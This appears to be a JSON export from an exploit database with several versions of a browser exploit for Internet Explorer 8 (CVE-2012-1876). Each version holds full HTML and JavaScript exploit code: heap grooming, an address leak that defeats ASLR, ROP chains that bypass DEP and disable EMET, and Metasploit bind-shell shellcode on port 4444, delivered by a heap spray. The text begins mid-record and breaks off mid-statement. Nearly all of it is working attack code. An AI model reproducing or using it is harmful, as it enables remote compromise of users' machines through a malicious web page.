unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2); // JMP EAX\n shellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX\n shellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect()\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\n shellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD\n shellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n\n // EMET disable part 0x02\n // Execute the Corbomite bluff to disarm EAF\n shellcode+= unescape(\"%uc0b8%u6d10\");\n shellcode+= unescape(\"%u8b07%u8b00\");\n shellcode+= unescape(\"%u6800%u10c8\");\n shellcode+= unescape(\"%u076d%ud0ff\");\n shellcode+= unescape(\"%ud468%u6d10\");\n shellcode+= unescape(\"%u5007%uc4b8\");\n shellcode+= unescape(\"%u6d10%u8b07\");\n shellcode+= unescape(\"%u8b00%uff00\");\n shellcode+= unescape(\"%u8bd0%u81f0\");\n shellcode+= unescape(\"%uccec%u0002\");\n shellcode+= unescape(\"%uc700%u2404\");\n shellcode+= unescape(\"%u0010%u0001\");\n shellcode+= unescape(\"%ufc8b%uccb9\");\n shellcode+= unescape(\"%u0002%u8300\");\n shellcode+= unescape(\"%u04c7%ue983\");\n shellcode+= unescape(\"%u3304%uf3c0\");\n shellcode+= unescape(\"%u54aa%ufe6a\");\n shellcode+= unescape(\"%ud6ff%u9090\");\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u29eb\"); // NOPs\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW\n shellcode+= unescape(\"%u\"+getprocaddr1+\"%u\"+getprocaddr2); // GetProcAddress\n shellcode+= \"NTDLL\";\n shellcode+= unescape(\"%u0000\");\n shellcode+= unescape(\"%u744e%u6553\"); // NtSetContextThread\n shellcode+= unescape(\"%u4374%u6e6f\");\n shellcode+= unescape(\"%u6574%u7478\");\n shellcode+= unescape(\"%u6854%u6572\");\n shellcode+= unescape(\"%u6461%u0000\");\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n // EMET disable part 0x02 end\n\n // Bind shellcode on 4444 :)\n // msf > generate -t js_le\n // windows/shell_bind_tcp - 342 bytes\n // http://www.metasploit.com\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\n // I would keep the shellcode the same size for better reliability :)\n\n shellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" +\n \"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" +\n \"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" +\n \"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" +\n \"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" +\n \"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" +\n \"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" +\n \"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" +\n \"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" +\n \"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" +\n \"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" +\n \"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" +\n \"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" +\n \"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" +\n \"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" +\n \"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" +\n \"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" +\n \"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" +\n \"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" +\n \"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" +\n \"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" +\n \"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" +\n \"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" +\n \"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" +\n \"%u006a%uff53%u41d5\");\n\n // Total spray should be 1000\n var padding = unescape(\"%u9090\");\n while (padding.length < 1000)\n padding = padding + padding;\n var padding = padding.substr(0, 1000 - shellcode.length);\n\n shellcode+= padding;\n\n while (shellcode.length < 100000)\n shellcode = shellcode + shellcode;\n\n var onemeg = shellcode.substr(0, 64*1024/2);\n\n for (i=0; i<14; i++) {\n onemeg += shellcode.substr(0, 64*1024/2);\n }\n\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\n\n var spray = new Array();\n\n for (i=0; i<100; i++) {\n spray[i] = onemeg.substr(0, onemeg.length);\n }\n}\n\nfunction leak(){\n var leak_col = document.getElementById(\"132\");\n leak_col.width = \"41\";\n leak_col.span = \"19\";\n}\n\nfunction get_leak() {\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\n str_addr = str_addr - 1410704;\n var hex = str_addr.toString(16);\n //alert(hex);\n setTimeout(function(){heapspray(str_addr)}, 50);\n}\n\nfunction trigger_overflow(){\n var evil_col = document.getElementById(\"132\");\n evil_col.width = \"1245880\";\n evil_col.span = \"44\";\n}\n\nsetTimeout(function(){leak()}, 400);\nsetTimeout(function(){get_leak()},450);\nsetTimeout(function(){trigger_overflow()}, 700);\n\n</script>\n</body>\n</html>", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:32", "description": "\nMicrosoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 5.0 Bypass) (MS12-037)", "edition": 1, "published": "2014-09-29T00:00:00", "title": "Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 5.0 Bypass) (MS12-037)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2014-09-29T00:00:00", "id": "EXPLOITPACK:8D25D01AEAA652118123781053A4BDBA", "href": "", "sourceData": "<!--\n** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.0 bypass\n** Exploit Coded by sickness || EMET 5.0 bypass by ryujin\n** http://www.offensive-security.com/vulndev/disarming-emet-v5-0/ \u200e\n** Affected Software: Internet Explorer 8\n** Vulnerability: Fixed Col Span ID\n** CVE: CVE-2012-1876\n** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 5.0\n-->\n\n<html>\n<body>\n<div id=\"evil\"></div>\n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" >\u00a0 </col></table>\n<script language='javascript'>\n\nfunction strtoint(str) {\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\n}\n\nvar free = \"EEEE\";\nwhile ( free.length < 500 ) free += free;\n\nvar string1 = \"AAAA\";\nwhile ( string1.length < 500 ) string1 += string1;\n\nvar string2 = \"BBBB\";\nwhile ( string2.length < 500 ) string2 += string2;\n\nvar fr = new Array();\nvar al = new Array();\nvar bl = new Array();\n\nvar div_container = document.getElementById(\"evil\");\ndiv_container.style.cssText = \"display:none\";\n\nfor (var i=0; i < 500; i+=2) {\n fr[i] = free.substring(0, (0x100-6)/2);\n al[i] = string1.substring(0, (0x100-6)/2);\n bl[i] = string2.substring(0, (0x100-6)/2);\n var obj = document.createElement(\"button\");\n div_container.appendChild(obj);\n}\n\nfor (var i=200; i<500; i+=2 ) {\n fr[i] = null;\n CollectGarbage();\n}\n\nfunction heapspray(cbuttonlayout) {\n CollectGarbage();\n var rop = cbuttonlayout + 4161; // RET\n var rop = rop.toString(16);\n var rop1 = rop.substring(4,8);\n var rop2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 11360; // POP EBP\n var rop = rop.toString(16);\n var rop3 = rop.substring(4,8);\n var rop4 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\n var rop = rop.toString(16);\n var rop5 = rop.substring(4,8);\n var rop6 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12377; // POP EBX\n var rop = rop.toString(16);\n var rop7 = rop.substring(4,8);\n var rop8 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 642768; // POP EDX\n var rop = rop.toString(16);\n var rop9 = rop.substring(4,8);\n var rop10 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\n var rop = rop.toString(16);\n var rop11 = rop.substring(4,8);\n var rop12 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 5504544; // Writable location\n var rop = rop.toString(16);\n var writable1 = rop.substring(4,8);\n var writable2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12462; // POP EDI\n var rop = rop.toString(16);\n var rop13 = rop.substring(4,8);\n var rop14 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\n var rop = rop.toString(16);\n var rop15 = rop.substring(4,8);\n var rop16 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 63776; // JMP EAX\n var rop = rop.toString(16);\n var jmpeax1 = rop.substring(4,8);\n var jmpeax2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 85751; // POP EAX\n var rop = rop.toString(16);\n var rop17 = rop.substring(4,8);\n var rop18 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 4936; // VirtualProtect()\n var rop = rop.toString(16);\n var vp1 = rop.substring(4,8);\n var vp2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\n var rop = rop.toString(16);\n var rop19 = rop.substring(4,8);\n var rop20 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 234657; // PUSHAD\n var rop = rop.toString(16);\n var rop21 = rop.substring(4,8);\n var rop22 = rop.substring(0,4); // } RET\n\n\n var rop = cbuttonlayout + 408958; // PUSH ESP\n var rop = rop.toString(16);\n var rop23 = rop.substring(4,8);\n var rop24 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2228408; // POP ECX\n var rop = rop.toString(16);\n var rop25 = rop.substring(4,8);\n var rop26 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1586172; // POP EAX\n var rop = rop.toString(16);\n var rop27 = rop.substring(4,8);\n var rop28 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]\n var rop = rop.toString(16);\n var rop29 = rop.substring(4,8);\n var rop30 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1884912; // PUSH EAX\n var rop = rop.toString(16);\n var rop31 = rop.substring(4,8);\n var rop32 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2140694; // ADD EAX,ECX\n var rop = rop.toString(16);\n var rop33 = rop.substring(4,8);\n var rop34 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX\n var rop = rop.toString(16);\n var rop35 = rop.substring(4,8);\n var rop36 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 5036248; // ADD ESP,0C\n var rop = rop.toString(16);\n var rop37 = rop.substring(4,8);\n var rop38 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX\n var rop = rop.toString(16);\n var rop39 = rop.substring(4,8);\n var rop40 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 3660458; // MOV EDX,EAX # MOV EAX,EDX # POP ESI\n var rop = rop.toString(16);\n var rop41 = rop.substring(4,8);\n var rop42 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1560432; // PUSH EDX # CALL EAX\n var rop = rop.toString(16);\n var rop43 = rop.substring(4,8);\n var rop44 = rop.substring(0,4); // } RET\n\n var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW\n var getmodulew = getmodulew.toString(16);\n var getmodulew1 = getmodulew.substring(4,8);\n var getmodulew2 = getmodulew.substring(0,4); // } RET\n\n\n var shellcode = unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\n shellcode+= unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\n shellcode+= unescape(\"%u4141%u4141\"); // PADDING\n\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\n shellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN\n\n // EMET disable part 0x01\n // Implement the Tachyon detection grid to overcome the Romulan cloaking device.\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW Ptr\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u10c4%u076d\"); // EMET_STRING_PTR (GetModuleHandle argument)\n shellcode+= unescape(\"%ua84c%u000a\"); // EMET_CONFIG_STRUCT offset \n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\n shellcode+= unescape(\"%u10c0%u076d\"); // MEM_ADDRESS_PTR (Store EMET base address here for later)\n shellcode+= unescape(\"%u\"+rop39+\"%u\"+rop40); // MOV DWORD PTR DS:[ESI],EAX\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (Get the address of EMET_CONFIG_STRUCT)\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\n shellcode+= unescape(\"%u104c%u076d\"); // Get fake DecodePointer argument from the stack and update it with the encoded value\n shellcode+= unescape(\"%u\"+rop39+\"%u\"+rop40); // MOV DWORD PTR DS:[ESI],EAX\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\n shellcode+= unescape(\"%u10c0%u076d\"); // Get EMET base address Ptr\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u80b0%u0004\"); // Get DecodePointer offset from the stack \n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (DecodePointer in IAT)\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\n shellcode+= unescape(\"%u9090%u9090\"); // Fake DecodePointer argument (Will be patched)\n shellcode+= unescape(\"%u10bc%u076d\"); // MEM_ADDRESS_PTR (Store decoded pointer here here for later)\n shellcode+= unescape(\"%u\"+rop39+\"%u\"+rop40); // MOV DWORD PTR DS:[ESI],EAX\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u0558%u0000\"); // ROP Protections offset\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u0000%u0000\"); // NULL\n shellcode+= unescape(\"%u\"+rop35+\"%u\"+rop36); // MOV DWORD PTR [EAX],ECX # RETN\n // EMET disable part 0x01 end\n\n // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBP\n shellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024\n shellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX\n shellcode+= unescape(\"%u0040%u0000\"); // 0x00000040\n shellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX\n shellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location\n shellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\n shellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2);// JMP EAX\n shellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX\n shellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect()\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\n shellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD\n shellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP\n\n // Store various pointers here\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u14eb\"); // NOPs\n shellcode+= unescape(\"%u4242%u4242\"); // Decoded CONFIG structure pointer\n shellcode+= unescape(\"%u4141%u4141\"); // Store BaseAddress address on the *stack*\n shellcode+= \"EMET\"; // EMET string\n shellcode+= unescape(\"%u0000%u0000\"); // EMET string\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n // Store various pointers here\n\n // EMET disable part 0x02\n // MOV EAX,DWORD PTR DS:[076D10BCH]\n // MOV ESI,DWORD PTR [EAX+518H]\n // SUB ESP,2CCH\n // MOV DWORD PTR [ESP],10010H\n // MOV EDI,ESP\n // MOV ECX,2CCH\n // ADD EDI,4\n // SUB ECX,4\n // XOR EAX,EAX\n // REP STOS BYTE PTR ES:[EDI]\n // PUSH ESP\n // PUSH 0FFFFFFFEH\n // CALL ESI\n shellcode+= unescape(\"%ubca1%u6d10%u8b07%u18b0%u0005%u8100%uccec\" +\n \"%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9\" +\n \"%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa\" +\n \"%ufe6a%ud6ff\");\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n // EMET disable part 0x02 end\n\n // Bind shellcode on 4444 :)\n // msf > generate -t js_le\n // windows/shell_bind_tcp - 342 bytes\n // http://www.metasploit.com\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\n // I would keep the shellcode the same size for better reliability :)\n\n shellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" +\n \"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" +\n \"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" +\n \"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" +\n \"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" +\n \"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" +\n \"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" +\n \"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" +\n \"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" +\n \"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" +\n \"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" +\n \"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" +\n \"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" +\n \"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" +\n \"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" +\n \"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" +\n \"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" +\n \"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" +\n \"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" +\n \"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" +\n \"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" +\n \"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" +\n \"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" +\n \"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" +\n \"%u006a%uff53%u41d5\");\n\n // Total spray should be 1000\n var padding = unescape(\"%u9090\");\n while (padding.length < 1000)\n padding = padding + padding;\n var padding = padding.substr(0, 1000 - shellcode.length);\n\n shellcode+= padding;\n\n while (shellcode.length < 100000)\n shellcode = shellcode + shellcode;\n\n var onemeg = shellcode.substr(0, 64*1024/2);\n\n for (i=0; i<14; i++) {\n onemeg += shellcode.substr(0, 64*1024/2);\n }\n\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\n\n var spray = new Array();\n\n for (i=0; i<100; i++) {\n spray[i] = onemeg.substr(0, onemeg.length);\n }\n}\n\nfunction leak(){\n var leak_col = document.getElementById(\"132\");\n leak_col.width = \"41\";\n leak_col.span = \"19\";\n}\n\nfunction get_leak() {\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\n str_addr = str_addr - 1410704;\n var hex = str_addr.toString(16);\n //alert(hex);\n setTimeout(function(){heapspray(str_addr)}, 50);\n}\n\nfunction trigger_overflow(){\n var evil_col = document.getElementById(\"132\");\n evil_col.width = \"1245880\";\n evil_col.span = \"44\";\n}\n\nsetTimeout(function(){leak()}, 400);\nsetTimeout(function(){get_leak()},450);\nsetTimeout(function(){trigger_overflow()}, 700);\n\n</script>\n</body>\n</html>", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:32", "description": "\nMicrosoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP Bypass) (MS12-037)", "edition": 1, "published": "2013-01-10T00:00:00", "title": "Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP Bypass) (MS12-037)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2013-01-10T00:00:00", "id": "EXPLOITPACK:B3A5822873FF7E264F097AB7EE9F4396", "href": "", "sourceData": "<!--\n** Exploit Title: Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass\n** Author: sickness@offsec.com\n** Thanks to Ryujin, Dookie and mr_me :) for their help.\n\n####################################################################\n\n** Affected Software: Internet Explorer 8\n** Vulnerability: Fixed Col Span ID\n** CVE: CVE-2012-1876\n** Metasploit exploit using NON-ASLR DLL: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_037_ie_colspan.rb\n** Vupen Blog post: http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php\n** Tested on Windows 7 (x86) - IE 8.0.7601.17514\n** Old version of the exploit available at: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24017-old.zip\n\n####################################################################\n\n** The exploit bypasses ASLR without the need of any NON-ASLR dll's using a leak :)\n** To get it working on a different version of Windows you will require to make your own chances to the exploit :)\n** Have fun :)\n-->\n\n<html>\n<body>\n<div id=\"evil\"></div>\n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" >\u00a0 </col></table>\n<script language='javascript'>\n\nfunction strtoint(str) {\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\n}\n\nvar free = \"EEEE\";\nwhile ( free.length < 500 ) free += free;\n\nvar string1 = \"AAAA\";\nwhile ( string1.length < 500 ) string1 += string1;\n\nvar string2 = \"BBBB\";\nwhile ( string2.length < 500 ) string2 += string2;\n\nvar fr = new Array();\nvar al = new Array();\nvar bl = new Array();\n\nvar div_container = document.getElementById(\"evil\");\ndiv_container.style.cssText = \"display:none\";\n\nfor (var i=0; i < 500; i+=2) {\n fr[i] = free.substring(0, (0x100-6)/2);\n al[i] = string1.substring(0, (0x100-6)/2);\n bl[i] = string2.substring(0, (0x100-6)/2);\n var obj = document.createElement(\"button\");\n div_container.appendChild(obj);\n}\n\nfor (var i=200; i<500; i+=2 ) {\n fr[i] = null;\n CollectGarbage();\n}\n\nfunction heapspray(cbuttonlayout) {\n CollectGarbage();\n var rop = cbuttonlayout + 4161; // RET\n var rop = rop.toString(16);\n var rop1 = rop.substring(4,8);\n var rop2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 11360; // POP EBP\n var rop = rop.toString(16);\n var rop3 = rop.substring(4,8);\n var rop4 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\n var rop = rop.toString(16);\n var rop5 = rop.substring(4,8);\n var rop6 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12377; // POP EBX\n var rop = rop.toString(16);\n var rop7 = rop.substring(4,8);\n var rop8 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 642768; // POP EDX\n var rop = rop.toString(16);\n var rop9 = rop.substring(4,8);\n var rop10 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\n var rop = rop.toString(16);\n var rop11 = rop.substring(4,8);\n var rop12 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 5504544; // Writable location\n var rop = rop.toString(16);\n var writable1 = rop.substring(4,8);\n var writable2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12462; // POP EDI\n var rop = rop.toString(16);\n var rop13 = rop.substring(4,8);\n var rop14 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\n var rop = rop.toString(16);\n var rop15 = rop.substring(4,8);\n var rop16 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 63776; // JMP EAX\n var rop = rop.toString(16);\n var jmpeax1 = rop.substring(4,8);\n var jmpeax2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 85751; // POP EAX\n var rop = rop.toString(16);\n var rop17 = rop.substring(4,8);\n var rop18 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 4936; // VirtualProtect()\n var rop = rop.toString(16);\n var vp1 = rop.substring(4,8);\n var vp2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\n var rop = rop.toString(16);\n var rop19 = rop.substring(4,8);\n var rop20 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 234657; // PUSHAD\n var rop = rop.toString(16);\n var rop21 = rop.substring(4,8);\n var rop22 = rop.substring(0,4); // } RET\n\n\n var rop = cbuttonlayout + 408958; // PUSH ESP\n var rop = rop.toString(16);\n var rop23 = rop.substring(4,8);\n var rop24 = rop.substring(0,4); // } RET\n\n var shellcode = unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\n shellcode+= unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\n shellcode+= unescape(\"%u4141%u4141\"); // PADDING\n\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\n shellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN\n\n // Standard DEP bypass\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBP\n shellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024\n shellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX\n shellcode+= unescape(\"%u0040%u0000\"); // 0x00000040\n shellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX\n shellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location\n shellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\n shellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2); // JMP EAX\n shellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX\n shellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect()\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\n shellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD\n shellcode+= 